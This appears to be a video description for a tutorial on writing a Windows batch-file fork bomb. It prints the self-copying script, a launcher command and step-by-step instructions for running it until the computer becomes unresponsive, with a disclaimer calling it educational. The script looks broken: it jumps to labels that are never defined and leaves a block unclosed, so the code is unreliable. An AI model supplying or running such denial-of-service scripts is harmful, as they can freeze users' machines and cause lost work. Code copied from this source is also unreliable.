Creating a Fork Bomb in Batch | Extreme System Crash Tutorial!

Описание к видео Creating a Fork Bomb in Batch | Extreme System Crash Tutorial!

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In today's video, I'm showing you how to create a fork bomb using a batch file in Windows. This is a powerful script that can crash your system by overwhelming it with processes. Proceed with caution!
💻 Code:

Fork Bomb Code:
@echo off
set name=%0
set clone=1
If not exist clone%clone%.bat (
copy "%name%" "clone%clone%.bat"
) else (
set /a clone=%clone%+1
GoTo clone
start %name%
start clone%clone%.bat
GoTo start

Run Batch File Code:
start fork_bomb.bat

📜 Instructions:

Create the Fork Bomb Batch File:
Open Notepad and paste the fork bomb code above.
Save the file as fork_bomb.bat.

Test the Fork Bomb:
Double-click on fork_bomb.bat. If the file doesn't execute fully, proceed to the next step.

Create the Run Batch File:
Open Notepad and paste the run batch file code above.
Save the file as run.bat.

Execute the Run Batch File:
Double-click on run.bat to see the fork bomb in action.

⚠️ Warning:

This script will rapidly create and execute numerous processes, causing your system to become unresponsive. Use this script only in a safe and controlled environment. To stop the process, you may need to press and hold the power button to force shut down your PC. After restarting, make sure to remove the created files.
📢 Disclaimer:

I am not responsible for any damage caused by the use of this script. This video is for educational purposes only. Please use this knowledge responsibly and ethically.
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Thank you for watching, and stay safe!


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